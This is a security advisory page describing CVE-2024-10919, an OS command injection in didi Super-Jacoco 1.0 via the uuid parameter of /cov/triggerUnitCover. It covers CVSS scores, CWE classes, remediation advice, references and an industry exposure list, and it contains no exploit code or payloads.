CVE-2024-10919:A remote OS command injection vulnerability exists in didi Super-Jacoco 1.0 via the /cov/triggerUnitCover endpoint by manipulating the uuid parameter, potentially allowing an attacker to execute arbitrary commands on the host. The advisory notes this vulnerability as critical, and it affects the 1.0 release.

splash
Back

Description Preview

The vulnerability (CVE-2024-10919) affects didi Super-Jacoco 1.0 and is triggered by an unsafe handling of the uuid argument in the /cov/triggerUnitCover function. Exploitation can occur remotely, enabling an attacker to inject and execute OS commands on the vulnerable system. The issue is categorized under CWE-78 (OS Command Injection) and CWE-74 (Injection). The advisory describes the vulnerability as critical; however, common scoring across CVSS versions places the base impact as medium in several vectors (CVSS v3.1: 6.3, CVSS v3.0: 6.3, CVSS v4.0: 5.3, CVSS v2.0: 6.5). An exploit has been disclosed publicly, highlighting the real-world risk. Version 1.0 is identified as affected.

Overview

This CVE describes a command injection vulnerability in didi Super-Jacoco 1.0 arising from unsafe handling of the uuid parameter in the /cov/triggerUnitCover endpoint. The flaw permits remote exploitation, enabling an attacker to run arbitrary commands on the host, with potential impact depending on the privileges of the running process. The vulnerability is associated with OS command injection (CWE-78) and general injection (CWE-74), and public disclosures of the exploit indicate real-world risk.

Remediation

  • Upgrade to a fixed version or apply vendor-provided patch for didi Super-Jacoco if a fix is released for the 1.0 line. If no patch is available, implement compensating controls and monitor for exploitation.
  • Validate and sanitize all user-controlled inputs, especially the uuid parameter, on the server side. Avoid constructing shell commands from input; use safe APIs or parameterized calls.
  • Implement strict input validation and allow-listing for expected uuid formats; reject unexpected patterns before they reach any command execution layer.
  • Restrict access to the vulnerable endpoint (/cov/triggerUnitCover) with authentication, authorization checks, and network access controls (e.g., IP allowlists, firewall rules).
  • Run the application with least-privilege privileges and separate the service account from highly sensitive system credentials.
  • Deploy Web Application Firewall (WAF) rules or IDS signatures to detect and block command-injection payloads targeting this endpoint.
  • Conduct testing in a controlled environment to verify that input validation and command execution paths are properly hardened before deploying to production.
  • Monitor logs and implement alerting for suspicious payloads or anomalous command executions; if exploitation is detected, rotate credentials, investigate, and contain affected hosts.

References

  • VDB-283315 | didi Super-Jacoco triggerUnitCover os command injection — https://vuldb.com/?id.283315
  • VDB-283315 | CTI Indicators (IOB, IOC, TTP, IOA) — https://vuldb.com/?ctiid.283315
  • Submit #432689 | didi super-jacoco 1.0 Command Injection — https://vuldb.com/?submit.432689
  • GitHub issue: didi/super-jacoco/issues/49 — https://github.com/didi/super-jacoco/issues/49

Industry ExposureMost to least
This section illustrates the prevalence of a specific Common Vulnerabilities and Exposures (CVE) across various industries based on customer reports. The ranking displays industries from the most to least affected by this particular vulnerability, offering valuable insight into where this CVE has been most frequently observed. This information can help organizations within these sectors prioritize their security efforts, understand their relative risk exposure compared to their peers, and focus remediation strategies where they are most needed. By understanding the industry-specific impact, organizations can make more informed decisions regarding patching, resource allocation, and overall risk management related to this CVE.

  1. Accommodation & Food Services: Low
    Accommodation & Food Services
  2. Administrative, Support, Waste Management & Remediation Services: Low
    Administrative, Support, Waste Management & Remediation Services
  3. Agriculture, Forestry Fishing & Hunting: Low
    Agriculture, Forestry Fishing & Hunting
  4. Arts, Entertainment & Recreation: Low
    Arts, Entertainment & Recreation
  5. Construction: Low
    Construction
  6. Educational Services: Low
    Educational Services
  7. Finance and Insurance: Low
    Finance and Insurance
  8. Health Care & Social Assistance: Low
    Health Care & Social Assistance
  9. Information: Low
    Information
  10. Management of Companies & Enterprises: Low
    Management of Companies & Enterprises
  11. Manufacturing: Low
    Manufacturing
  12. Mining: Low
    Mining
  13. Other Services (except Public Administration): Low
    Other Services (except Public Administration)
  14. Professional, Scientific, & Technical Services: Low
    Professional, Scientific, & Technical Services
  15. Public Administration: Low
    Public Administration
  16. Real Estate Rental & Leasing: Low
    Real Estate Rental & Leasing
  17. Retail Trade: Low
    Retail Trade
  18. Transportation & Warehousing: Low
    Transportation & Warehousing
  19. Utilities: Low
    Utilities
  20. Wholesale Trade: Low
    Wholesale Trade

Focus on What Matters

  1. See Everything.
  2. Identify True Risk.
  3. Proactively Mitigate Threats.

Let's talk!

background